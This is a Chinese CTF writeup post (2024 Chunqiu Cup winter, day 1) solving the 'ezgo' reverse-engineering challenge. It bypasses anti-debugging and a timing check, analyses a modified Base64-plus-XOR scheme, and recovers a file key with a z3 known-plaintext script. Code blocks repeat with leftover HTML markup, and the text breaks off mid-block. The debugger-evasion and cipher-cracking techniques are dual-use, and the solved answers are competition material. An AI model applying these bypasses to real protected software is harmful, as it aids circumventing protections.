【相关分享】2024春秋杯冬季赛三日Writeup汇总(部分)

免责声明

❝

由于传播、利用本公众号”隼目安全”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号”隼目安全”及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢！

2024春秋杯冬季赛day1

ezgo

IDA调试发现有反调试检测，直接同样ScyllaHide插件一键去除。

找到main_main函数，发现有个加密函数。

通过这部分代码分析出是Base64加密，main_byte_16321就是Base表。

但是查看交叉引用发现main_byte_16321在main_init_0被修改换表，所以真实表应该是下面这个。

加密函数结尾，对Base64加密后的密文进行了异或0xC处理。

main_main函数要求输入一个4长度的字符串，动调发现无论输入什么四位字符，最终加密完都是6个密文字符+2个等号。

加密完对密文进行字节分割，在以下片段分别对第0、2、3、4、5、7下标的字符进行了异或计算。

这边有个time_Since应该是时间检测。

直接在汇编代码该处进行命令断点，设置rax=0xffffffff即可绕过检测

动调发现以下是对文件进行解密。

之前输入四位字符加密得到的8个字符以下统称Key，且被异或处理的称为EncKey

整体解密流程如下：

<span leaf="">v51 = 文件字节[i]</span><span leaf=""><br></span><span leaf="">v61 = v62 = EncKey[i%8]</span><span leaf=""><br></span><span leaf="">v63 = v61 ^ main_byte_65163[v62]</span><span leaf=""><br></span><span leaf="">v65 = i % 2</span><span leaf=""><br></span><span leaf="">v51 ^= v63</span><span leaf=""><br></span><span leaf="">文件字节[i] = v51 ^ EncKey[i%v65 + 4]</span><span leaf=""><br></span>
<span leaf="">v51 = 文件字节[i]</span><span leaf=""><br></span><span leaf="">v61 = v62 = EncKey[i%8]</span><span leaf=""><br></span><span leaf="">v63 = v61 ^ main_byte_65163[v62]</span><span leaf=""><br></span><span leaf="">v65 = i % 2</span><span leaf=""><br></span><span leaf="">v51 ^= v63</span><span leaf=""><br></span><span leaf="">文件字节[i] = v51 ^ EncKey[i%v65 + 4]</span><span leaf=""><br></span>
v51 = 文件字节[i]
v61 = v62 = EncKey[i%8]
v63 = v61 ^ main_byte_65163[v62]
v65 = i % 2
v51 ^= v63
文件字节[i] = v51 ^ EncKey[i%v65 + 4]

main_byte_65163是一个256大小的QWORD数组。

解密流程清楚了，接下来是解出EncKey，由于Key的最后两位统一是两个等号，所以EncKey的最后两位也固定。

所以就需要解出EncKey前六个字节。

由于原文件已知是zip格式，所以可以利用zip文件开头几个字节和结尾段的前几个字节当作已知明文，去对应被加密的zip.zip的对应字节。

ZIP文件开头和结尾段前几个字节：

<span leaf="">开头</span><span leaf=""><br></span><span leaf="">0x50, 0x4B, 0x03, 0x04, 0x14</span><span leaf=""><br></span><span leaf="">倒数22个字节开始</span><span leaf=""><br></span><span leaf="">0x50, 0x4B, 0x05, 0x06</span><span leaf=""><br></span>
<span leaf="">开头</span><span leaf=""><br></span><span leaf="">0x50, 0x4B, 0x03, 0x04, 0x14</span><span leaf=""><br></span><span leaf="">倒数22个字节开始</span><span leaf=""><br></span><span leaf="">0x50, 0x4B, 0x05, 0x06</span><span leaf=""><br></span>
开头
0x50, 0x4B, 0x03, 0x04, 0x14
倒数22个字节开始
0x50, 0x4B, 0x05, 0x06

被加密的文件对应字节如下：

<span leaf="">开头</span><span leaf=""><br></span><span leaf="">0x0E, 0xE1, 0xE5, 0xF9, 0x0C</span><span leaf=""><br></span><span leaf="">倒数22个字节开始</span><span leaf=""><br></span><span leaf="">0xB6, 0xB6, 0x1D, 0x9F</span><span leaf=""><br></span>
<span leaf="">开头</span><span leaf=""><br></span><span leaf="">0x0E, 0xE1, 0xE5, 0xF9, 0x0C</span><span leaf=""><br></span><span leaf="">倒数22个字节开始</span><span leaf=""><br></span><span leaf="">0xB6, 0xB6, 0x1D, 0x9F</span><span leaf=""><br></span>
开头
0x0E, 0xE1, 0xE5, 0xF9, 0x0C
倒数22个字节开始
0xB6, 0xB6, 0x1D, 0x9F

利用z3进行约束求解，即可求出EncKey。

求解代码：

<span leaf="">from z3 import *</span><span leaf=""><br></span><span leaf="">origin = [0x50, 0x4B, 0x03, 0x04, 0x14]</span><span leaf=""><br></span><span leaf="">cipher = [0x0E, 0xE1, 0xE5, 0xF9, 0x0C]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># main_byte_65163</span></span><span leaf=""><br></span><span leaf="">Bytes_ = [0x01,0x57,0x2C,0x7C,0xC7,0x72,0x20,0x70,0xA5,0x96,0x21,</span><span leaf=""><br></span><span leaf="">0xDC,0xA8,0x76,0x69,0x14,0xC5,0x24,0x25,0x02,0xB7,0x7A,</span><span leaf=""><br></span><span leaf="">0xFC,0xF0,0xC4,0x49,0x56,0xC2,0xC1,0x95,0xEC,0x26,0xCC,</span><span leaf=""><br></span><span leaf="">0xF7,0xFF,0x73,0xE1,0x3F,0x84,0x46,0xA9,0xF9,0x3D,0x0E,</span><span leaf=""><br></span><span leaf="">0x45,0xF1,0xDA,0x92,0xCE,0x3B,0x3C,0xA0,0x16,0xBC,0x2D,</span><span leaf=""><br></span><span leaf="">0xBD,0xA4,0x32,0x90,0x62,0x9D,0x0C,0xDE,0xAD,0x40,0xCF,</span><span leaf=""><br></span><span leaf="">0x4B,0x4D,0x6E,0x79,0xC8,0x85,0xD2,0xAC,0x99,0xE8,0x1E,</span><span leaf=""><br></span><span leaf="">0xC9,0xD4,0x06,0x34,0x66,0xB8,0xD3,0x13,0xF4,0x42,0x1B,</span><span leaf=""><br></span><span leaf="">0x63,0x5F,0x82,0x5B,0x91,0x2A,0x33,0x5D,0xB9,0x7D,0xD5,</span><span leaf=""><br></span><span leaf="">0x6C,0x0D,0x28,0x08,0x9B,0x18,0x2E,0xA2,0x67,0x5A,0xE6,</span><span leaf=""><br></span><span leaf="">0x8A,0x19,0x50,0x9C,0xB1,0xEF,0x1F,0x12,0xBA,0x86,0x83,</span><span leaf=""><br></span><span leaf="">0x77,0x60,0x94,0xFD,0xF6,0x54,0xBF,0xA1,0x93,0x03,0xE7,</span><span leaf=""><br></span><span leaf="">0x58,0xE5,0x9A,0x7F,0x22,0xBE,0xD9,0x38,0x27,0x65,0xD7,</span><span leaf=""><br></span><span leaf="">0x23,0xFB,0x71,0xFA,0x8F,0xF5,0x6D,0x51,0x9E,0xD6,0x8B,</span><span leaf=""><br></span><span leaf="">0x89,0x11,0xCA,0x0F,0x8E,0xCB,0xB3,0xBB,0xF2,0x87,0x75,</span><span leaf=""><br></span><span leaf="">0x5C,0x2F,0x98,0x2B,0x1C,0xB4,0xC6,0x0A,0x4C,0x36,0x1A,</span><span leaf=""><br></span><span leaf="">0x15,0x88,0x1D,0xE4,0xC3,0x97,0x53,0x30,0x4A,0x3A,0xB5,</span><span leaf=""><br></span><span leaf="">0x61,0x55,0xC0,0xA7,0xDB,0x29,0x68,0xE2,0xE0,0x10,0x09,</span><span leaf=""><br></span><span leaf="">0x41,0x31,0xF3,0xAF,0xB6,0x6A,0x6F,0x00,0x05,0x0B,0xE3,</span><span leaf=""><br></span><span leaf="">0xD1,0x8D,0x47,0x74,0x78,0x7B,0x64,0xDD,0xAB,0xB0,0x39,</span><span leaf=""><br></span><span leaf="">0x37,0xFE,0xED,0x52,0xCD,0x81,0xF8,0xAA,0x48,0x6B,0xD0,</span><span leaf=""><br></span><span leaf="">0xEB,0x8C,0x44,0x59,0x17,0x9F,0x4F,0xB2,0x35,0xA3,0x7E,</span><span leaf=""><br></span><span leaf="">0xEE,0x4E,0xDF,0xE9,0x07,0x43,0xA6,0xAE,0xD8,0xEA,0x80,</span><span leaf=""><br></span><span leaf="">0x3E,0x04,0x5E]</span><span leaf=""><br></span><span leaf="">Bytes_array = Array(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'Bytes'</span></span><span leaf="">, BitVecSort(8), BitVecSort(8))</span><span leaf=""><br></span><span leaf="">s = Solver()</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> i </span><span style="color: #c678dd;line-height: 26px;"><span leaf="">in</span></span><span leaf=""> range(256):</span><span leaf=""><br></span><span leaf="">s.add(Bytes_array[i] == Bytes_[i])</span><span leaf=""><br></span><span leaf="">Key1,Key2,Key3,Key4,Key5,Key6 = BitVecs(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"Key1 Key2 Key3 Key4 Key5 Key6"</span></span><span leaf="">,8)</span><span leaf=""><br></span><span leaf="">s.add(cipher[0] == origin[0] ^ Key1 ^ Key5 ^ Bytes_array[Key1])</span><span leaf=""><br></span><span leaf="">s.add(cipher[1] == origin[1] ^ Key2 ^ Key6 ^ Bytes_array[Key2])</span><span leaf=""><br></span><span leaf="">s.add(cipher[2] == origin[2] ^ Key3 ^ Key5 ^ Bytes_array[Key3])</span><span leaf=""><br></span><span leaf="">s.add(cipher[3] == origin[3] ^ Key4 ^ Key6 ^ Bytes_array[Key4])</span><span leaf=""><br></span><span leaf="">s.add(cipher[4] == origin[4] ^ Key5 ^ Key5 ^ Bytes_array[Key5])</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># Zip文件尾段开头4个字节</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 通过下标234%8得到2，也就是从Key3开始加密</span></span><span leaf=""><br></span><span leaf="">s.add(0xB6 == 0x50 ^ Key3 ^ Key5 ^ Bytes_array[Key3])</span><span leaf=""><br></span><span leaf="">s.add(0xB6 == 0x4B ^ Key4 ^ Key6 ^ Bytes_array[Key4])</span><span leaf=""><br></span><span leaf="">s.add(0x1D == 0x05 ^ Key5 ^ Key5 ^ Bytes_array[Key5])</span><span leaf=""><br></span><span leaf="">s.add(0x9F == 0x06 ^ Key6 ^ Key6 ^ Bytes_array[Key6])</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 必须在可视字符范围内</span></span><span leaf=""><br></span><span leaf="">s.add((Key1^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key1^2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key3^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key3^2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key4^5)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key4^5)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key5^5)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key5^5)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key6^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key6^2)<=126)</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">if</span></span><span leaf=""> s.check() == sat:</span><span leaf=""><br></span><span leaf="">m=s.model()</span><span leaf=""><br></span><span leaf="">k1 = m[Key1].as_long()</span><span leaf=""><br></span><span leaf="">k2 = m[Key2].as_long()</span><span leaf=""><br></span><span leaf="">k3 = m[Key3].as_long()</span><span leaf=""><br></span><span leaf="">k4 = m[Key4].as_long()</span><span leaf=""><br></span><span leaf="">k5 = m[Key5].as_long()</span><span leaf=""><br></span><span leaf="">k6 = m[Key6].as_long()</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 得到EncKey</span></span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k1}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k2}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k3}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k4}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k5}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k6}"</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 108,62,65,98,104,74</span></span><span leaf=""><br></span>
<span leaf="">from z3 import *</span><span leaf=""><br></span><span leaf="">origin = [0x50, 0x4B, 0x03, 0x04, 0x14]</span><span leaf=""><br></span><span leaf="">cipher = [0x0E, 0xE1, 0xE5, 0xF9, 0x0C]</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># main_byte_65163</span></span><span leaf=""><br></span><span leaf="">Bytes_ = [0x01,0x57,0x2C,0x7C,0xC7,0x72,0x20,0x70,0xA5,0x96,0x21,</span><span leaf=""><br></span><span leaf="">0xDC,0xA8,0x76,0x69,0x14,0xC5,0x24,0x25,0x02,0xB7,0x7A,</span><span leaf=""><br></span><span leaf="">0xFC,0xF0,0xC4,0x49,0x56,0xC2,0xC1,0x95,0xEC,0x26,0xCC,</span><span leaf=""><br></span><span leaf="">0xF7,0xFF,0x73,0xE1,0x3F,0x84,0x46,0xA9,0xF9,0x3D,0x0E,</span><span leaf=""><br></span><span leaf="">0x45,0xF1,0xDA,0x92,0xCE,0x3B,0x3C,0xA0,0x16,0xBC,0x2D,</span><span leaf=""><br></span><span leaf="">0xBD,0xA4,0x32,0x90,0x62,0x9D,0x0C,0xDE,0xAD,0x40,0xCF,</span><span leaf=""><br></span><span leaf="">0x4B,0x4D,0x6E,0x79,0xC8,0x85,0xD2,0xAC,0x99,0xE8,0x1E,</span><span leaf=""><br></span><span leaf="">0xC9,0xD4,0x06,0x34,0x66,0xB8,0xD3,0x13,0xF4,0x42,0x1B,</span><span leaf=""><br></span><span leaf="">0x63,0x5F,0x82,0x5B,0x91,0x2A,0x33,0x5D,0xB9,0x7D,0xD5,</span><span leaf=""><br></span><span leaf="">0x6C,0x0D,0x28,0x08,0x9B,0x18,0x2E,0xA2,0x67,0x5A,0xE6,</span><span leaf=""><br></span><span leaf="">0x8A,0x19,0x50,0x9C,0xB1,0xEF,0x1F,0x12,0xBA,0x86,0x83,</span><span leaf=""><br></span><span leaf="">0x77,0x60,0x94,0xFD,0xF6,0x54,0xBF,0xA1,0x93,0x03,0xE7,</span><span leaf=""><br></span><span leaf="">0x58,0xE5,0x9A,0x7F,0x22,0xBE,0xD9,0x38,0x27,0x65,0xD7,</span><span leaf=""><br></span><span leaf="">0x23,0xFB,0x71,0xFA,0x8F,0xF5,0x6D,0x51,0x9E,0xD6,0x8B,</span><span leaf=""><br></span><span leaf="">0x89,0x11,0xCA,0x0F,0x8E,0xCB,0xB3,0xBB,0xF2,0x87,0x75,</span><span leaf=""><br></span><span leaf="">0x5C,0x2F,0x98,0x2B,0x1C,0xB4,0xC6,0x0A,0x4C,0x36,0x1A,</span><span leaf=""><br></span><span leaf="">0x15,0x88,0x1D,0xE4,0xC3,0x97,0x53,0x30,0x4A,0x3A,0xB5,</span><span leaf=""><br></span><span leaf="">0x61,0x55,0xC0,0xA7,0xDB,0x29,0x68,0xE2,0xE0,0x10,0x09,</span><span leaf=""><br></span><span leaf="">0x41,0x31,0xF3,0xAF,0xB6,0x6A,0x6F,0x00,0x05,0x0B,0xE3,</span><span leaf=""><br></span><span leaf="">0xD1,0x8D,0x47,0x74,0x78,0x7B,0x64,0xDD,0xAB,0xB0,0x39,</span><span leaf=""><br></span><span leaf="">0x37,0xFE,0xED,0x52,0xCD,0x81,0xF8,0xAA,0x48,0x6B,0xD0,</span><span leaf=""><br></span><span leaf="">0xEB,0x8C,0x44,0x59,0x17,0x9F,0x4F,0xB2,0x35,0xA3,0x7E,</span><span leaf=""><br></span><span leaf="">0xEE,0x4E,0xDF,0xE9,0x07,0x43,0xA6,0xAE,0xD8,0xEA,0x80,</span><span leaf=""><br></span><span leaf="">0x3E,0x04,0x5E]</span><span leaf=""><br></span><span leaf="">Bytes_array = Array(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">'Bytes'</span></span><span leaf="">, BitVecSort(8), BitVecSort(8))</span><span leaf=""><br></span><span leaf="">s = Solver()</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> i </span><span style="color: #c678dd;line-height: 26px;"><span leaf="">in</span></span><span leaf=""> range(256):</span><span leaf=""><br></span><span leaf="">s.add(Bytes_array[i] == Bytes_[i])</span><span leaf=""><br></span><span leaf="">Key1,Key2,Key3,Key4,Key5,Key6 = BitVecs(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"Key1 Key2 Key3 Key4 Key5 Key6"</span></span><span leaf="">,8)</span><span leaf=""><br></span><span leaf="">s.add(cipher[0] == origin[0] ^ Key1 ^ Key5 ^ Bytes_array[Key1])</span><span leaf=""><br></span><span leaf="">s.add(cipher[1] == origin[1] ^ Key2 ^ Key6 ^ Bytes_array[Key2])</span><span leaf=""><br></span><span leaf="">s.add(cipher[2] == origin[2] ^ Key3 ^ Key5 ^ Bytes_array[Key3])</span><span leaf=""><br></span><span leaf="">s.add(cipher[3] == origin[3] ^ Key4 ^ Key6 ^ Bytes_array[Key4])</span><span leaf=""><br></span><span leaf="">s.add(cipher[4] == origin[4] ^ Key5 ^ Key5 ^ Bytes_array[Key5])</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># Zip文件尾段开头4个字节</span></span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 通过下标234%8得到2，也就是从Key3开始加密</span></span><span leaf=""><br></span><span leaf="">s.add(0xB6 == 0x50 ^ Key3 ^ Key5 ^ Bytes_array[Key3])</span><span leaf=""><br></span><span leaf="">s.add(0xB6 == 0x4B ^ Key4 ^ Key6 ^ Bytes_array[Key4])</span><span leaf=""><br></span><span leaf="">s.add(0x1D == 0x05 ^ Key5 ^ Key5 ^ Bytes_array[Key5])</span><span leaf=""><br></span><span leaf="">s.add(0x9F == 0x06 ^ Key6 ^ Key6 ^ Bytes_array[Key6])</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 必须在可视字符范围内</span></span><span leaf=""><br></span><span leaf="">s.add((Key1^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key1^2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key3^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key3^2)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key4^5)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key4^5)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key5^5)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key5^5)<=126)</span><span leaf=""><br></span><span leaf="">s.add((Key6^2)>=32)</span><span leaf=""><br></span><span leaf="">s.add((Key6^2)<=126)</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">if</span></span><span leaf=""> s.check() == sat:</span><span leaf=""><br></span><span leaf="">m=s.model()</span><span leaf=""><br></span><span leaf="">k1 = m[Key1].as_long()</span><span leaf=""><br></span><span leaf="">k2 = m[Key2].as_long()</span><span leaf=""><br></span><span leaf="">k3 = m[Key3].as_long()</span><span leaf=""><br></span><span leaf="">k4 = m[Key4].as_long()</span><span leaf=""><br></span><span leaf="">k5 = m[Key5].as_long()</span><span leaf=""><br></span><span leaf="">k6 = m[Key6].as_long()</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 得到EncKey</span></span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k1}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k2}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k3}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k4}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k5}"</span></span><span leaf="">,end=</span><span style="color: #98c379;line-height: 26px;"><span leaf="">','</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">print</span></span><span leaf="">(f</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"{k6}"</span></span><span leaf="">)</span><span leaf=""><br></span><span style="color: #5c6370;font-style: italic;line-height: 26px;"><span leaf=""># 108,62,65,98,104,74</span></span><span leaf=""><br></span>
from z3 import *
origin = [0x50, 0x4B, 0x03, 0x04, 0x14]
cipher = [0x0E, 0xE1, 0xE5, 0xF9, 0x0C]
# main_byte_65163
Bytes_ = [0x01,0x57,0x2C,0x7C,0xC7,0x72,0x20,0x70,0xA5,0x96,0x21,
0xDC,0xA8,0x76,0x69,0x14,0xC5,0x24,0x25,0x02,0xB7,0x7A,
0xFC,0xF0,0xC4,0x49,0x56,0xC2,0xC1,0x95,0xEC,0x26,0xCC,
0xF7,0xFF,0x73,0xE1,0x3F,0x84,0x46,0xA9,0xF9,0x3D,0x0E,
0x45,0xF1,0xDA,0x92,0xCE,0x3B,0x3C,0xA0,0x16,0xBC,0x2D,
0xBD,0xA4,0x32,0x90,0x62,0x9D,0x0C,0xDE,0xAD,0x40,0xCF,
0x4B,0x4D,0x6E,0x79,0xC8,0x85,0xD2,0xAC,0x99,0xE8,0x1E,
0xC9,0xD4,0x06,0x34,0x66,0xB8,0xD3,0x13,0xF4,0x42,0x1B,
0x63,0x5F,0x82,0x5B,0x91,0x2A,0x33,0x5D,0xB9,0x7D,0xD5,
0x6C,0x0D,0x28,0x08,0x9B,0x18,0x2E,0xA2,0x67,0x5A,0xE6,
0x8A,0x19,0x50,0x9C,0xB1,0xEF,0x1F,0x12,0xBA,0x86,0x83,
0x77,0x60,0x94,0xFD,0xF6,0x54,0xBF,0xA1,0x93,0x03,0xE7,
0x58,0xE5,0x9A,0x7F,0x22,0xBE,0xD9,0x38,0x27,0x65,0xD7,
0x23,0xFB,0x71,0xFA,0x8F,0xF5,0x6D,0x51,0x9E,0xD6,0x8B,
0x89,0x11,0xCA,0x0F,0x8E,0xCB,0xB3,0xBB,0xF2,0x87,0x75,
0x5C,0x2F,0x98,0x2B,0x1C,0xB4,0xC6,0x0A,0x4C,0x36,0x1A,
0x15,0x88,0x1D,0xE4,0xC3,0x97,0x53,0x30,0x4A,0x3A,0xB5,
0x61,0x55,0xC0,0xA7,0xDB,0x29,0x68,0xE2,0xE0,0x10,0x09,
0x41,0x31,0xF3,0xAF,0xB6,0x6A,0x6F,0x00,0x05,0x0B,0xE3,
0xD1,0x8D,0x47,0x74,0x78,0x7B,0x64,0xDD,0xAB,0xB0,0x39,
0x37,0xFE,0xED,0x52,0xCD,0x81,0xF8,0xAA,0x48,0x6B,0xD0,
0xEB,0x8C,0x44,0x59,0x17,0x9F,0x4F,0xB2,0x35,0xA3,0x7E,
0xEE,0x4E,0xDF,0xE9,0x07,0x43,0xA6,0xAE,0xD8,0xEA,0x80,
0x3E,0x04,0x5E]
Bytes_array = Array('Bytes', BitVecSort(8), BitVecSort(8))
s = Solver()
for i in range(256):
s.add(Bytes_array[i] == Bytes_[i])
Key1,Key2,Key3,Key4,Key5,Key6 = BitVecs("Key1 Key2 Key3 Key4 Key5 Key6",8)
s.add(cipher[0] == origin[0] ^ Key1 ^ Key5 ^ Bytes_array[Key1])
s.add(cipher[1] == origin[1] ^ Key2 ^ Key6 ^ Bytes_array[Key2])
s.add(cipher[2] == origin[2] ^ Key3 ^ Key5 ^ Bytes_array[Key3])
s.add(cipher[3] == origin[3] ^ Key4 ^ Key6 ^ Bytes_array[Key4])
s.add(cipher[4] == origin[4] ^ Key5 ^ Key5 ^ Bytes_array[Key5])
# Zip文件尾段开头4个字节
# 通过下标234%8得到2，也就是从Key3开始加密
s.add(0xB6 == 0x50 ^ Key3 ^ Key5 ^ Bytes_array[Key3])
s.add(0xB6 == 0x4B ^ Key4 ^ Key6 ^ Bytes_array[Key4])
s.add(0x1D == 0x05 ^ Key5 ^ Key5 ^ Bytes_array[Key5])
s.add(0x9F == 0x06 ^ Key6 ^ Key6 ^ Bytes_array[Key6])
# 必须在可视字符范围内
s.add((Key1^2)>=32)
s.add((Key1^2)<=126)
s.add((Key2)>=32)
s.add((Key2)<=126)
s.add((Key3^2)>=32)
s.add((Key3^2)<=126)
s.add((Key4^5)>=32)
s.add((Key4^5)<=126)
s.add((Key5^5)>=32)
s.add((Key5^5)<=126)
s.add((Key6^2)>=32)
s.add((Key6^2)<=126)
if s.check() == sat:
m=s.model()
k1 = m[Key1].as_long()
k2 = m[Key2].as_long()
k3 = m[Key3].as_long()
k4 = m[Key4].as_long()
k5 = m[Key5].as_long()
k6 = m[Key6].as_long()
# 得到EncKey
print(f"{k1}",end=',')
print(f"{k2}",end=',')
print(f"{k3}",end=',')
print(f"{k4}",end=',')
print(f"{k5}",end=',')
print(f"{k6}")
# 108,62,65,98,104,74

输出得到EncKey = {108,62,65,98,104,74};

再将EncKey进行异或处理的还原以及0xC异或的还原，即可得到原Key。

还原代码：

<span leaf="">int </span><span style="line-height: 26px;"><span style="color: #61aeee;line-height: 26px;"><span leaf="">main_ez_go</span></span></span><span leaf="">()</span><span leaf=""><br></span><span leaf="">{</span><span leaf=""><br></span><span leaf="">// 由z3解出来的EncKey</span><span leaf=""><br></span><span leaf="">int key[] = { 108,62,65,98,104,74 };</span><span leaf=""><br></span><span leaf="">// 还原EncKey</span><span leaf=""><br></span><span leaf="">key[0] ^= 2;</span><span leaf=""><br></span><span leaf="">key[2] ^= 2;</span><span leaf=""><br></span><span leaf="">key[3] ^= 5;</span><span leaf=""><br></span><span leaf="">key[4] ^= 5;</span><span leaf=""><br></span><span leaf="">key[5] ^= 2;</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (int i = 0; i < 6; i++)</span><span leaf=""><br></span><span leaf="">{</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">printf</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"%c"</span></span><span leaf="">, key[i]^0xc);</span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span><span leaf="">// b2OkaD</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> 0;</span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span>
<span leaf="">int </span><span style="line-height: 26px;"><span style="color: #61aeee;line-height: 26px;"><span leaf="">main_ez_go</span></span></span><span leaf="">()</span><span leaf=""><br></span><span leaf="">{</span><span leaf=""><br></span><span leaf="">// 由z3解出来的EncKey</span><span leaf=""><br></span><span leaf="">int key[] = { 108,62,65,98,104,74 };</span><span leaf=""><br></span><span leaf="">// 还原EncKey</span><span leaf=""><br></span><span leaf="">key[0] ^= 2;</span><span leaf=""><br></span><span leaf="">key[2] ^= 2;</span><span leaf=""><br></span><span leaf="">key[3] ^= 5;</span><span leaf=""><br></span><span leaf="">key[4] ^= 5;</span><span leaf=""><br></span><span leaf="">key[5] ^= 2;</span><span leaf=""><br></span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> (int i = 0; i < 6; i++)</span><span leaf=""><br></span><span leaf="">{</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">printf</span></span><span leaf="">(</span><span style="color: #98c379;line-height: 26px;"><span leaf="">"%c"</span></span><span leaf="">, key[i]^0xc);</span><span leaf=""><br></span><span leaf="">}</span><span leaf=""><br></span><span leaf="">// b2OkaD</span><span leaf=""><br></span><span style="color: #e6c07b;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> 0;</span><span leaf=""><br></span><span 